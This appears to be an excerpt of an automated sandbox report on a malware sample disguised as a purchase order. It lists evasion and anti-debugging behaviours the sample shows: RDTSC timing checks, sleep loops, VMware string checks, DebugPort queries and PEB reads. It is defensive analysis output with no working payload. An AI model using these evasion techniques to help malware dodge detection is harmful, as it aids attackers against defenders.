Source: unknown

Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe

Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	RDTSC instruction interceptor: First address: 00000000004083D4 second address: 00000000004083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	RDTSC instruction interceptor: First address: 000000000040876E second address: 0000000000408774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe	RDTSC instruction interceptor: First address: 0000000002B083D4 second address: 0000000002B083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe	RDTSC instruction interceptor: First address: 0000000002B0876E second address: 0000000002B08774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe

Code function: 1_2_004086A0 rdtsc

1_2_004086A0

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\explorer.exe TID: 5636	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6160	Thread sleep time: -48000s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\ipconfig.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\ipconfig.exe	Last function: Thread delayed

Source: explorer.exe, 00000002.00000000.258328544.0000000008A32000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000002.00000000.258328544.0000000008A32000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000002.00000000.258818986.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.258818986.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 00000002.00000000.251236949.00000000048E0000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.259375031.0000000008C73000.00000004.00000001.sdmp	Binary or memory string: _VMware_SATA_CD00#5&
Source: explorer.exe, 00000002.00000000.258557851.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 00000002.00000000.258818986.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: explorer.exe, 00000002.00000000.258557851.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000002.00000000.254456910.00000000069DA000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD002
Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000000.259579486.0000000008D97000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}October%%
Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe

Code function: 1_2_004086A0 rdtsc

1_2_004086A0

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe

Code function: 1_2_00409900 LdrLoadDll,

1_2_00409900

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe

Code function: 0_2_013E032D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_013E032D

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe

0_2_013D7FB0

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_013FD014 mov eax, dword ptr fs:[00000030h]	0_2_013FD014
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_013FD051 mov eax, dword ptr fs:[00000030h]	0_2_013FD051
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_013FD0B4 mov eax, dword ptr fs:[00000030h]	0_2_013FD0B4
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_013FC520 mov eax, dword ptr fs:[00000030h]	0_2_013FC520
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F858EC mov eax, dword ptr fs:[00000030h]	1_2_00F858EC
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F840E1 mov eax, dword ptr fs:[00000030h]	1_2_00F840E1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F840E1 mov eax, dword ptr fs:[00000030h]	1_2_00F840E1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F840E1 mov eax, dword ptr fs:[00000030h]	1_2_00F840E1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBF0BF mov ecx, dword ptr fs:[00000030h]	1_2_00FBF0BF
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBF0BF mov eax, dword ptr fs:[00000030h]	1_2_00FBF0BF
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBF0BF mov eax, dword ptr fs:[00000030h]	1_2_00FBF0BF
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC90AF mov eax, dword ptr fs:[00000030h]	1_2_00FC90AF
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]	1_2_00FB20A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]	1_2_00FB20A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]	1_2_00FB20A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]	1_2_00FB20A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]	1_2_00FB20A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]	1_2_00FB20A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F89080 mov eax, dword ptr fs:[00000030h]	1_2_00F89080
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]	1_2_010449A4
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]	1_2_010449A4
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]	1_2_010449A4
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]	1_2_010449A4
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010069A6 mov eax, dword ptr fs:[00000030h]	1_2_010069A6
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FA0050 mov eax, dword ptr fs:[00000030h]	1_2_00FA0050
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FA0050 mov eax, dword ptr fs:[00000030h]	1_2_00FA0050
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]	1_2_010051BE
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]	1_2_010051BE
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]	1_2_010051BE
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]	1_2_010051BE
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]	1_2_00FAA830
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]	1_2_00FAA830
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]	1_2_00FAA830
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]	1_2_00FAA830
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]	1_2_00F9B02A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]	1_2_00F9B02A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]	1_2_00F9B02A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]	1_2_00F9B02A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]	1_2_00FB002D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]	1_2_00FB002D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]	1_2_00FB002D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]	1_2_00FB002D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]	1_2_00FB002D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010141E8 mov eax, dword ptr fs:[00000030h]	1_2_010141E8
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01054015 mov eax, dword ptr fs:[00000030h]	1_2_01054015
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01054015 mov eax, dword ptr fs:[00000030h]	1_2_01054015
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01007016 mov eax, dword ptr fs:[00000030h]	1_2_01007016
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01007016 mov eax, dword ptr fs:[00000030h]	1_2_01007016
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01007016 mov eax, dword ptr fs:[00000030h]	1_2_01007016
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8B1E1 mov eax, dword ptr fs:[00000030h]	1_2_00F8B1E1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8B1E1 mov eax, dword ptr fs:[00000030h]	1_2_00F8B1E1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8B1E1 mov eax, dword ptr fs:[00000030h]	1_2_00F8B1E1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB61A0 mov eax, dword ptr fs:[00000030h]	1_2_00FB61A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB61A0 mov eax, dword ptr fs:[00000030h]	1_2_00FB61A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB2990 mov eax, dword ptr fs:[00000030h]	1_2_00FB2990
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01051074 mov eax, dword ptr fs:[00000030h]	1_2_01051074
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01042073 mov eax, dword ptr fs:[00000030h]	1_2_01042073
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAC182 mov eax, dword ptr fs:[00000030h]	1_2_00FAC182
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBA185 mov eax, dword ptr fs:[00000030h]	1_2_00FBA185
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01003884 mov eax, dword ptr fs:[00000030h]	1_2_01003884
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01003884 mov eax, dword ptr fs:[00000030h]	1_2_01003884
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8B171 mov eax, dword ptr fs:[00000030h]	1_2_00F8B171
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8B171 mov eax, dword ptr fs:[00000030h]	1_2_00F8B171
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8C962 mov eax, dword ptr fs:[00000030h]	1_2_00F8C962
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAB944 mov eax, dword ptr fs:[00000030h]	1_2_00FAB944
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAB944 mov eax, dword ptr fs:[00000030h]	1_2_00FAB944
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB513A mov eax, dword ptr fs:[00000030h]	1_2_00FB513A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB513A mov eax, dword ptr fs:[00000030h]	1_2_00FB513A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]	1_2_0101B8D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0101B8D0 mov ecx, dword ptr fs:[00000030h]	1_2_0101B8D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]	1_2_0101B8D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]	1_2_0101B8D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]	1_2_0101B8D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]	1_2_0101B8D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h]	1_2_00FA4120
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h]	1_2_00FA4120
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h]	1_2_00FA4120
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h]	1_2_00FA4120
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FA4120 mov ecx, dword ptr fs:[00000030h]	1_2_00FA4120
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F89100 mov eax, dword ptr fs:[00000030h]	1_2_00F89100
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F89100 mov eax, dword ptr fs:[00000030h]	1_2_00F89100
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F89100 mov eax, dword ptr fs:[00000030h]	1_2_00F89100
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0104131B mov eax, dword ptr fs:[00000030h]	1_2_0104131B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB2AE4 mov eax, dword ptr fs:[00000030h]	1_2_00FB2AE4
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB2ACB mov eax, dword ptr fs:[00000030h]	1_2_00FB2ACB
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F9AAB0 mov eax, dword ptr fs:[00000030h]	1_2_00F9AAB0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F9AAB0 mov eax, dword ptr fs:[00000030h]	1_2_00F9AAB0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBFAB0 mov eax, dword ptr fs:[00000030h]	1_2_00FBFAB0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01058B58 mov eax, dword ptr fs:[00000030h]	1_2_01058B58
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]	1_2_00F852A5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]	1_2_00F852A5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]	1_2_00F852A5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]	1_2_00F852A5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]	1_2_00F852A5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBD294 mov eax, dword ptr fs:[00000030h]	1_2_00FBD294
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBD294 mov eax, dword ptr fs:[00000030h]	1_2_00FBD294
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0103D380 mov ecx, dword ptr fs:[00000030h]	1_2_0103D380
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC927A mov eax, dword ptr fs:[00000030h]	1_2_00FC927A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0104138A mov eax, dword ptr fs:[00000030h]	1_2_0104138A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01055BA5 mov eax, dword ptr fs:[00000030h]	1_2_01055BA5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h]	1_2_00F89240
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h]	1_2_00F89240
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h]	1_2_00F89240
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h]	1_2_00F89240
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010053CA mov eax, dword ptr fs:[00000030h]	1_2_010053CA
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_010053CA mov eax, dword ptr fs:[00000030h]	1_2_010053CA
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC4A2C mov eax, dword ptr fs:[00000030h]	1_2_00FC4A2C
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FC4A2C mov eax, dword ptr fs:[00000030h]	1_2_00FC4A2C
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]	1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]	1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]	1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]	1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]	1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]	1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]	1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]	1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]	1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FA3A1C mov eax, dword ptr fs:[00000030h]	1_2_00FA3A1C
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F85210 mov eax, dword ptr fs:[00000030h]	1_2_00F85210
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F85210 mov ecx, dword ptr fs:[00000030h]	1_2_00F85210
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F85210 mov eax, dword ptr fs:[00000030h]	1_2_00F85210
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F85210 mov eax, dword ptr fs:[00000030h]	1_2_00F85210
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8AA16 mov eax, dword ptr fs:[00000030h]	1_2_00F8AA16
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8AA16 mov eax, dword ptr fs:[00000030h]	1_2_00F8AA16
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F98A0A mov eax, dword ptr fs:[00000030h]	1_2_00F98A0A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0104AA16 mov eax, dword ptr fs:[00000030h]	1_2_0104AA16
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0104AA16 mov eax, dword ptr fs:[00000030h]	1_2_0104AA16
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FADBE9 mov eax, dword ptr fs:[00000030h]	1_2_00FADBE9
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]	1_2_00FB03E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]	1_2_00FB03E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]	1_2_00FB03E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]	1_2_00FB03E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]	1_2_00FB03E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]	1_2_00FB03E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0104EA55 mov eax, dword ptr fs:[00000030h]	1_2_0104EA55
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01014257 mov eax, dword ptr fs:[00000030h]	1_2_01014257
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB4BAD mov eax, dword ptr fs:[00000030h]	1_2_00FB4BAD
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB4BAD mov eax, dword ptr fs:[00000030h]	1_2_00FB4BAD
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB4BAD mov eax, dword ptr fs:[00000030h]	1_2_00FB4BAD
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0103B260 mov eax, dword ptr fs:[00000030h]	1_2_0103B260
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_0103B260 mov eax, dword ptr fs:[00000030h]	1_2_0103B260
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_01058A62 mov eax, dword ptr fs:[00000030h]	1_2_01058A62
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FBB390 mov eax, dword ptr fs:[00000030h]	1_2_00FBB390
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB2397 mov eax, dword ptr fs:[00000030h]	1_2_00FB2397
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F91B8F mov eax, dword ptr fs:[00000030h]	1_2_00F91B8F
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F91B8F mov eax, dword ptr fs:[00000030h]	1_2_00F91B8F
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB3B7A mov eax, dword ptr fs:[00000030h]	1_2_00FB3B7A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00FB3B7A mov eax, dword ptr fs:[00000030h]	1_2_00FB3B7A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 1_2_00F8DB60 mov ecx, dword ptr fs:[00000030h]	1_2_00F8DB60
